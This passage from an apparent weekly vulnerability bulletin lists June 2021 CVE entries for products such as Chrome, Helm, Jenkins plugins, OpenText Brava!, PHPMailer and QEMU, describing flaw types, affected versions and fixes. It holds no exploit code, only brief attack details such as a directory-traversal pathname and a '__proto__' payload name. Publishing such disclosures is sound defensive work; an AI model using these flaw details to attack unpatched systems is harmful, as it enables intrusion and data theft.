Use after free in Accessibility in Google Chrome prior to 91.0.4472.101 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page. 2021-06-15 not yet calculated CVE-2021-30550
MISC
MISC
hashicorp — nomad_and_nomad_enterprise
HashiCorp Nomad and Nomad Enterprise up to version 1.0.4 bridge networking mode allows ARP spoofing from other bridged tasks on the same node. Fixed in 0.12.12, 1.0.5, and 1.1.0 RC1. 2021-06-17 not yet calculated CVE-2021-32575
MISC
MISC
helm — helm
Helm is a tool for managing Charts (packages of pre-configured Kubernetes resources). In versions of helm prior to 3.6.1, a vulnerability exists where the username and password credentials associated with a Helm repository could be passed on to another domain referenced by that Helm repository. This issue has been resolved in 3.6.1. There is a workaround through which one may check for improperly passed credentials. One may use a username and password for a Helm repository and may audit the Helm repository in order to check for another domain being used that could have received the credentials. In the `index.yaml` file for that repository, one may look for another domain in the `urls` list for the chart versions. If there is another domain found and that chart version was pulled or installed, the credentials would be passed on. 2021-06-16 not yet calculated CVE-2021-32690
MISC
CONFIRM
hitachi — abb_power_grids_ellipse
Cross-site Scripting (XSS) vulnerability in the main dashboard of Ellipse APM allows an authenticated user or integrated application to inject malicious data into the application that can then be executed in a victim’s browser. This issue affects: Hitachi ABB Power Grids Ellipse APM 5.3 version 5.3.0.1 and prior versions; 5.2 version 5.2.0.3 and prior versions; 5.1 version 5.1.0.6 and prior versions. 2021-06-14 not yet calculated CVE-2021-27887
CONFIRM
hitachi — abb_power_grids_esoms
Information Exposure vulnerability in Hitachi ABB Power Grids eSOMS allows an unauthorized user to gain access to report data if the URL used to access the report is discovered. This issue affects: Hitachi ABB Power Grids eSOMS 6.0 versions prior to 6.0.4.2.2; 6.1 versions prior to 6.1.4; 6.3 versions prior to 6.3. 2021-06-14 not yet calculated CVE-2021-26845
CONFIRM
hitachi — multiple_products
Improper Input Validation vulnerability in Hitachi ABB Power Grids Relion 670 Series, Relion 670/650 Series, Relion 670/650/SAM600-IO, Relion 650, REB500, RTU500 Series, FOX615 (TEGO1), MSM, GMS600, PWC600 allows an attacker with access to the IEC 61850 network with knowledge of how to reproduce the attack, as well as the IP addresses of the different IEC 61850 access points (of IEDs/products), to force the device to reboot, which renders the device inoperable for approximately 60 seconds. This vulnerability affects only products with IEC 61850 interfaces. This issue affects: Hitachi ABB Power Grids Relion 670 Series 1.1; 1.2.3 versions prior to 1.2.3.20; 2.0 versions prior to 2.0.0.13; 2.1; 2.2.2 versions prior to 2.2.2.3; 2.2.3 versions prior to 2.2.3.2. Hitachi ABB Power Grids Relion 670/650 Series 2.2.0 versions prior to 2.2.0.13. Hitachi ABB Power Grids Relion 670/650/SAM600-IO 2.2.1 versions prior to 2.2.1.6. Hitachi ABB Power Grids Relion 650 1.1; 1.2; 1.3 versions prior to 1.3.0.7. Hitachi ABB Power Grids REB500 7.3; 7.4; 7.5; 7.6; 8.2; 8.3. Hitachi ABB Power Grids RTU500 Series 7.x version 7.x and prior versions; 8.x version 8.x and prior versions; 9.x version 9.x and prior versions; 10.x version 10.x and prior versions; 11.x version 11.x and prior versions; 12.x version 12.x and prior versions. Hitachi ABB Power Grids FOX615 (TEGO1) R1D02 version R1D02 and prior versions. Hitachi ABB Power Grids MSM 2.1.0 versions prior to 2.1.0. Hitachi ABB Power Grids GMS600 1.3.0 version 1.3.0 and prior versions. Hitachi ABB Power Grids PWC600 1.0 versions prior to 1.0.1.4; 1.1 versions prior to 1.1.0.1. 2021-06-14 not yet calculated CVE-2021-27196
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
ibm — aix
IBM AIX 7.1 could allow a non-privileged local user to exploit a vulnerability in the trace facility to expose sensitive information or cause a denial of service. IBM X-Force ID: 200663. 2021-06-17 not yet calculated CVE-2021-29706
XF
CONFIRM
ibm — financial_transaction_manager
IBM Financial Transaction Manager 3.0.2 and 3.2.4 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 192952. 2021-06-15 not yet calculated CVE-2020-5000
XF
CONFIRM
ibm — resilient_soar
IBM Resilient SOAR V38.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 199238. 2021-06-16 not yet calculated CVE-2021-20566
CONFIRM
XF
ibm — resilient_soar
IBM Resilient SOAR V38.0 could allow a local privileged attacker to obtain sensitive information due to improper or nonexisting encryption. IBM X-Force ID: 199239. 2021-06-16 not yet calculated CVE-2021-20567
CONFIRM
XF
ibm — security_identity_manager
IBM Security Identity Manager 6.0.2 could allow an authenticated malicious user to change the passwords of other users in the Windows AD environment when IBM Security Identity Manager Windows Password Synch Plug-in is deployed and configured. IBM X-Force ID: 197789. 2021-06-16 not yet calculated CVE-2021-20488
XF
CONFIRM
ibm — security_identity_manager
IBM Security Identity Manager 6.0.2 is vulnerable to server-side request forgery (SSRF). By sending a specially crafted request, a remote authenticated attacker could exploit this vulnerability to obtain sensitive data. IBM X-Force ID: 197591. 2021-06-16 not yet calculated CVE-2021-20483
XF
CONFIRM
insyde — insydeh2o
An issue was discovered in IdeBusDxe in Insyde InsydeH2O 5.x. Code in system management mode calls a function outside of SMRAM in response to a crafted software SMI, aka Inclusion of Functionality from an Untrusted Control Sphere. Modifying the well-known address of this function allows an attacker to gain control of the system with the privileges of system management mode. 2021-06-16 not yet calculated CVE-2020-27339
MISC
MISC
intel — brand_verification_tool
Improper permissions in the installer for the Intel(R) Brand Verification Tool before version 11.0.0.1225 may allow an authenticated user to potentially enable escalation of privilege via local access. 2021-06-17 not yet calculated CVE-2021-0143
MISC
jact — openclinic
Jact OpenClinic 0.8.20160412 allows the attacker to read server files after logging in to the admin account via an infected ‘file’ GET parameter in ‘/shared/view_source.php’, which “could” lead to an RCE vulnerability. 2021-06-16 not yet calculated CVE-2020-20444
CONFIRM
jdom — saxbuilder
An XXE issue in SAXBuilder in JDOM through 2.0.6 allows attackers to cause a denial of service via a crafted HTTP request. 2021-06-16 not yet calculated CVE-2021-33813
MISC
MISC
MISC
jenkins — generic_webhook_trigger_plugin
Jenkins Generic Webhook Trigger Plugin 1.72 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks. 2021-06-18 not yet calculated CVE-2021-21669
CONFIRM
MLIST
jenkins — scriptler
Jenkins Scriptler Plugin 3.2 and earlier does not escape parameter names shown in job configuration forms, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Scriptler/Configure permission. 2021-06-16 not yet calculated CVE-2021-21667
CONFIRM
MLIST
jenkins — scriptler
Jenkins Scriptler Plugin 3.1 and earlier does not escape script content, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Scriptler/Configure permission. 2021-06-16 not yet calculated CVE-2021-21668
CONFIRM
MLIST
jpress — jpress
An issue was discovered in JPress v3.3.0 and below. There are XSS vulnerabilities in the template module and tag management module. If an attacker logs in to the backend, for example by means of a weak password, a stored XSS vulnerability can be triggered. 2021-06-18 not yet calculated CVE-2021-33347
MISC
MISC
kuaifancms — kuaifancms
KuaiFanCMS V5.x contains an arbitrary file read vulnerability in the html_url parameter of the chakanhtml.module.php file. 2021-06-11 not yet calculated CVE-2021-3256
MISC
laiketui — laiketui
LaikeTui 3.5.0 allows remote authenticated users to delete arbitrary files, as demonstrated by deleting install.lock in order to reinstall the product in an attacker-controlled manner. This deletion is possible via directory traversal in the uploadImg, oldpic, or imgurl parameter. 2021-06-15 not yet calculated CVE-2021-34129
MISC
laiketui — laiketui
LaikeTui 3.5.0 allows remote authenticated users to execute arbitrary PHP code by using index.php?module=system&action=pay to upload a ZIP archive containing a .php file, as demonstrated by the ../../../../phpinfo.php pathname. 2021-06-15 not yet calculated CVE-2021-34128
MISC
linux — linux_kernel
net/can/bcm.c in the Linux kernel through 5.12.10 allows local users to obtain sensitive information from kernel stack memory because parts of a data structure are uninitialized. 2021-06-14 not yet calculated CVE-2021-34693
MISC
MLIST
linux — linux_kernel
An Out-of-Bounds Read was discovered in arch/arm/mach-footbridge/personal-pci.c in the Linux kernel through 5.12.11 because of the lack of a check for a value that shouldn’t be negative, e.g., access to element -2 of an array, aka CID-298a58e165e4. 2021-06-17 not yet calculated CVE-2021-32078
CONFIRM
CONFIRM
MISC
lutils — lutils
All versions of package lutils are vulnerable to Prototype Pollution via the main (merge) function. 2021-06-17 not yet calculated CVE-2021-23396
MISC
magento — magento
magento-scripts contains scripts and configuration used by Create Magento App, a zero-configuration tool-chain which allows one to deploy Magento 2. In versions 1.5.1 and 1.5.2, after the function was changed from synchronous to asynchronous, no handler was implemented in the start, stop, exec, and logs commands, effectively making them unusable. Version 1.5.3 contains patches for the problems. 2021-06-14 not yet calculated CVE-2021-32684
MISC
CONFIRM
mantisbt — mantisbt
An XSS issue was discovered in manage_custom_field_edit_page.php in MantisBT before 2.25.2. Unescaped output of the return parameter allows an attacker to inject code into a hidden input field. 2021-06-17 not yet calculated CVE-2021-33557
MISC
CONFIRM
matrix — appservice-bridge
Matrix-appservice-bridge is the bridging service for the Matrix communication program’s application services. In versions 2.6.0 and earlier, if a bridge has room upgrade handling turned on in the configuration (the `roomUpgradeOpts` key when instantiating a new `Bridge` instance), any `m.room.tombstone` event it encounters will be used to unbridge the current room and bridge into the target room. However, the target room `m.room.create` event is not checked to verify if the `predecessor` field contains the previous room. This means that any malicious admin of a bridged room can repoint the traffic to a different room without the new room being aware. Versions 2.6.1 and greater are patched. As a workaround, disabling the automatic room upgrade handling can be done by removing the `roomUpgradeOpts` key from the `Bridge` class options. 2021-06-16 not yet calculated CVE-2021-32659
MISC
MISC
CONFIRM
matrix — libolm
Matrix libolm before 3.2.3 allows a malicious Matrix homeserver to crash a client (while it is attempting to retrieve an Olm encrypted room key backup from the homeserver) because olm_pk_decrypt has a stack-based buffer overflow. Remote code execution might be possible for some nonstandard build configurations. 2021-06-16 not yet calculated CVE-2021-34813
MISC
MISC
MISC
mcusystem — mcusystem
The login page in the MCUsystem does not filter special characters, which allows remote attackers to inject JavaScript without privileges and thus perform reflected XSS attacks. 2021-06-18 not yet calculated CVE-2021-32536
MISC
monstra — monstra
A local file inclusion vulnerability was discovered in the captcha function in Monstra 3.0.4 which allows remote attackers to execute arbitrary PHP code. 2021-06-17 not yet calculated CVE-2020-25414
MISC
moodle — moodle
Cross Site Scripting (XSS) in Moodle 3.10.3 allows remote attackers to execute arbitrary web script or HTML via the “Description” field. 2021-06-16 not yet calculated CVE-2021-32244
MISC
moxa — mgate_mb3180
 
An issue was discovered on MOXA Mgate MB3180 Version 2.1 Build 18113012. An attacker could send a huge number of TCP SYN packets to exhaust the web service’s resources, resulting in a denial of service of the web server. 2021-06-18 not yet calculated CVE-2021-33823
MISC
MISC
moxa — mgate_mb3180
 
An issue was discovered on MOXA Mgate MB3180 Version 2.1 Build 18113012. Attackers can use the slowhttptest tool to send incomplete HTTP requests, which could make the server keep waiting for the packets that would finish the connection until its resources are exhausted, resulting in a denial of service of the web server. 2021-06-18 not yet calculated CVE-2021-33824
MISC
MISC
MISC
nedb — nedb
 
This affects all versions of package nedb. The library could be tricked into adding or modifying properties of Object.prototype using a __proto__ or constructor.prototype payload. 2021-06-15 not yet calculated CVE-2021-23395
MISC
nextcloud — android_app
 
Nextcloud Android app is the Android client for Nextcloud. In versions prior to 3.15.1, a malicious application on the same device could crash the Nextcloud Android Client due to an uncaught exception. The vulnerability is patched in version 3.15.1. 2021-06-17 not yet calculated CVE-2021-32694
CONFIRM
MISC
MISC
nextcloud — android_app
 
Nextcloud Android app is the Android client for Nextcloud. In versions prior to 3.16.1, a malicious app on the same device could have gotten access to the shared preferences of the Nextcloud Android application. This required user-interaction as a victim had to initiate the sharing flow and choose the malicious app. The shared preferences contain some limited private data such as push tokens and the account name. The vulnerability is patched in version 3.16.1. 2021-06-17 not yet calculated CVE-2021-32695
MISC
MISC
CONFIRM
nextcloud — talk
 
Nextcloud Talk is a fully on-premises audio/video and chat communication service. Password protected shared chats in Talk before version 9.0.10, 10.0.8 and 11.2.2 did not rotate the session cookie after a successful authentication event. It is recommended that the Nextcloud Talk App is upgraded to 9.0.10, 10.0.8 or 11.2.2. No workarounds for this vulnerability are known to exist. 2021-06-16 not yet calculated CVE-2021-32676
CONFIRM
MISC
octopus — server
 
Affected versions of Octopus Server are prone to an authenticated SQL injection vulnerability in the Events REST API because user supplied data in the API request isn’t parameterised correctly. Exploiting this vulnerability could allow unauthorised access to database tables. 2021-06-17 not yet calculated CVE-2021-31818
MISC
open_design_alliance — drawings_sdk
 
An out-of-bounds write issue exists in the DWG file-reading procedure in the Drawings SDK (All versions prior to 2022.4) resulting from the lack of proper validation of user-supplied data. This can result in a write past the end of an allocated buffer and allow attackers to cause a denial-of-service condition or execute code in the context of the current process. 2021-06-17 not yet calculated CVE-2021-32948
MISC
open_design_alliance — drawings_sdk
 
An out-of-bounds read issue exists in the DWG file-recovering procedure in the Drawings SDK (All versions prior to 2022.4) resulting from the lack of proper validation of user-supplied data. This can result in a read past the end of an allocated buffer and allow attackers to cause a denial-of-service condition or read sensitive information from memory locations. 2021-06-17 not yet calculated CVE-2021-32940
MISC
open_design_alliance — drawings_sdk
 
An out-of-bounds read issue exists within the parsing of DXF files in the Drawings SDK (All versions prior to 2022.4) resulting from the lack of proper validation of user-supplied data. This can result in a read past the end of an allocated buffer and allow attackers to cause a denial-of-service condition or read sensitive information from memory locations. 2021-06-17 not yet calculated CVE-2021-32950
MISC
open_design_alliance — drawings_sdk
 
A use-after-free issue exists in the DGN file-reading procedure in the Drawings SDK (All versions prior to 2022.4) resulting from the lack of proper validation of user-supplied data. This can result in a memory corruption or arbitrary code execution, allowing attackers to cause a denial-of-service condition or execute code in the context of the current process. 2021-06-17 not yet calculated CVE-2021-32944
MISC
open_design_alliance — drawings_sdk
 
Drawings SDK (All versions prior to 2022.4) is vulnerable to an out-of-bounds read during parsing of DWG files resulting from the lack of proper validation of user-supplied data. This can result in a read past the end of an allocated buffer and allow attackers to cause a denial-of-service condition or read sensitive information from memory. 2021-06-17 not yet calculated CVE-2021-32938
MISC
open_design_alliance — drawings_sdk
 
An improper check for unusual or exceptional conditions issue exists within the parsing of DGN files in the Drawings SDK (Version 2022.4 and prior) resulting from the lack of proper validation of user-supplied data. This may result in several out-of-bounds problems and allow attackers to cause a denial-of-service condition or execute code in the context of the current process. 2021-06-17 not yet calculated CVE-2021-32946
MISC
open_design_alliance — drawings_sdk
 
An out-of-bounds write issue exists in the DGN file-reading procedure in the Drawings SDK (Version 2022.4 and prior) resulting from the lack of proper validation of user-supplied data. This can result in a write past the end of an allocated buffer and allow attackers to cause a denial-of-service condition or execute code in the context of the current process. 2021-06-17 not yet calculated CVE-2021-32952
MISC
open_design_alliance — drawings_sdk
 
An out-of-bounds write issue exists in the DXF file-recovering procedure in the Drawings SDK (All versions prior to 2022.4) resulting from the lack of proper validation of user-supplied data. This can result in a write past the end of an allocated buffer and allow attackers to cause a denial-of-service condition or execute code in the context of the current process. 2021-06-17 not yet calculated CVE-2021-32936
MISC
opencast — opencast
 
Opencast is a free and open source solution for automated video capture and distribution. Versions of Opencast prior to 9.6 are vulnerable to the billion laughs attack, which allows an attacker to easily execute a (seemingly permanent) denial of service attack, essentially taking down Opencast using a single HTTP request. To exploit this, users need to have ingest privileges, limiting the group of potential attackers. The problem has been fixed in Opencast 9.6. There is no known workaround for this issue. 2021-06-16 not yet calculated CVE-2021-32623
MISC
CONFIRM
opentext — brava!
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12719. 2021-06-15 not yet calculated CVE-2021-31491
N/A
opentext — brava!
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop Build 16.6.4.55. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13673. 2021-06-15 not yet calculated CVE-2021-31502
N/A
opentext — brava!
 
This vulnerability allows remote attackers to disclose sensitive information on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWG files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated data structure. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-13310. 2021-06-15 not yet calculated CVE-2021-31501
N/A
opentext — brava!
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of DWG files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13311. 2021-06-15 not yet calculated CVE-2021-31497
N/A
opentext — brava!
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13308. 2021-06-15 not yet calculated CVE-2021-31496
N/A
opentext — brava!
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13307. 2021-06-15 not yet calculated CVE-2021-31495
N/A
opentext — brava!
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13304. 2021-06-15 not yet calculated CVE-2021-31493
N/A
opentext — brava!
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12720. 2021-06-15 not yet calculated CVE-2021-31492
N/A
opentext — brava!
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13305. 2021-06-15 not yet calculated CVE-2021-31494
N/A
opentext — brava!
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SLDPRT files. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12659. 2021-06-15 not yet calculated CVE-2021-31481
N/A
opentext — brava!
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12715. 2021-06-15 not yet calculated CVE-2021-31487
N/A
opentext — brava!
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWF files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12711. 2021-06-15 not yet calculated CVE-2021-31485
N/A
opentext — brava!
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12710. 2021-06-15 not yet calculated CVE-2021-31484
N/A
opentext — brava!
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWF files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12709. 2021-06-15 not yet calculated CVE-2021-31483
N/A
opentext — brava!
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12708. 2021-06-15 not yet calculated CVE-2021-31482
N/A
opentext — brava!
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWF files. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12746. 2021-06-15 not yet calculated CVE-2021-31500
N/A
opentext — brava!
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12633. 2021-06-15 not yet calculated CVE-2021-31478
N/A
opentext — brava!
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper initialization of a pointer prior to accessing it. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12634. 2021-06-15 not yet calculated CVE-2021-31479
N/A
opentext — brava!
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12654. 2021-06-15 not yet calculated CVE-2021-31480
N/A
opentext — brava!
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12716. 2021-06-15 not yet calculated CVE-2021-31488
N/A
opentext — brava!
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12745. 2021-06-15 not yet calculated CVE-2021-31499
N/A
opentext — brava!
 
This vulnerability allows remote attackers to disclose sensitive information on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated data structure. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-12744. 2021-06-15 not yet calculated CVE-2021-31498
N/A
opentext — brava!
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12717. 2021-06-15 not yet calculated CVE-2021-31489
N/A
opentext — brava!
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12712. 2021-06-15 not yet calculated CVE-2021-31486
N/A
opentext — brava!
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12718. 2021-06-15 not yet calculated CVE-2021-31490
N/A
otrs — ag_community_edition
 
A DoS attack can be performed when an email contains a specially designed URL in the body. It can lead to high CPU usage and cause low quality of service, or in extreme cases bring the system to a halt. This issue affects: OTRS AG ((OTRS)) Community Edition 6.0.x version 6.0.1 and later versions. OTRS AG OTRS 7.0.x version 7.0.26 and prior versions; 8.0.x version 8.0.13 and prior versions. 2021-06-14 not yet calculated CVE-2021-21439
MISC
otrs — ag_community_edition
 
There is an XSS vulnerability in the ticket overview screens. It’s possible to collect various information by having an e-mail shown in the overview screen. The attack can be performed by sending a specially crafted e-mail to the system and it doesn’t require any user interaction. This issue affects: OTRS AG ((OTRS)) Community Edition 6.0.x version 6.0.1 and later versions. OTRS AG OTRS 7.0.x version 7.0.26 and prior versions. 2021-06-16 not yet calculated CVE-2021-21441
MISC
pagekit — pagekit
 
In PageKit v1.0.18, a user can upload SVG files in the file upload portion of the CMS. These SVG files can contain malicious scripts. The file will be uploaded to the system and will not be stripped or filtered. The user can create a link on the website pointing to “/storage/exp.svg” that will resolve to localhost/pagekit/storage/exp.svg. When a user comes along and clicks that link, it will trigger an XSS attack. 2021-06-16 not yet calculated CVE-2021-32245
MISC
peloton — ttr01
 
Insufficient verification of data authenticity in Peloton TTR01 up to and including PTV55G allows an attacker with physical access to boot into a modified kernel/ramdisk without unlocking the bootloader. 2021-06-15 not yet calculated CVE-2021-33887
MISC
MISC
MISC
phpcms — phpcms
 
phpCMS 2008 sp4 allows remote malicious users to execute arbitrary PHP commands via the pagesize parameter to yp/product.php. 2021-06-16 not yet calculated CVE-2020-22201
MISC
phpcms — phpcms
 
SQL Injection in phpCMS 2008 sp4 via the genre parameter to yp/job.php. 2021-06-16 not yet calculated CVE-2020-22203
MISC
phpcms — phpcms
 
SQL Injection vulnerability in phpCMS 2007 SP6 build 0805 via the digg_mod parameter to digg_add.php. 2021-06-16 not yet calculated CVE-2020-22199
MISC
phpmailer — phpmailer
 
PHPMailer before 6.5.0 on Windows allows remote code execution if lang_path is untrusted data and has a UNC pathname. 2021-06-16 not yet calculated CVE-2021-34551
CONFIRM
phpmailer — phpmailer
 
PHPMailer 6.4.1 and earlier contain a vulnerability that can result in untrusted code being called (if such code is injected into the host project’s scope by other means). If the $patternselect parameter to validateAddress() is set to ‘php’ (the default, defined by PHPMailer::$validator), and the global namespace contains a function called php, it will be called in preference to the built-in validator of the same name. Mitigated in PHPMailer 6.5.0 by denying the use of simple strings as validator function names. 2021-06-17 not yet calculated CVE-2021-3603
MISC
CONFIRM
qemu — qemu
 
An invalid pointer initialization issue was found in the SLiRP networking implementation of QEMU. The flaw exists in the udp6_input() function and could occur while processing a udp packet that is smaller than the size of the ‘udphdr’ structure. This issue may lead to out-of-bounds read access or indirect host memory disclosure to the guest. The highest threat from this vulnerability is to data confidentiality. This flaw affects libslirp versions prior to 4.6.0. 2021-06-15 not yet calculated CVE-2021-3593
MISC
qemu — qemu
 
An invalid pointer initialization issue was found in the SLiRP networking implementation of QEMU. The flaw exists in the bootp_input() function and could occur while processing a udp packet that is smaller than the size of the ‘bootp_t’ structure. A malicious guest could use this flaw to leak 10 bytes of uninitialized heap memory from the host. The highest threat from this vulnerability is to data confidentiality. This flaw affects libslirp versions prior to 4.6.0. 2021-06-15 not yet calculated CVE-2021-3592
MISC
qemu — qemu
 
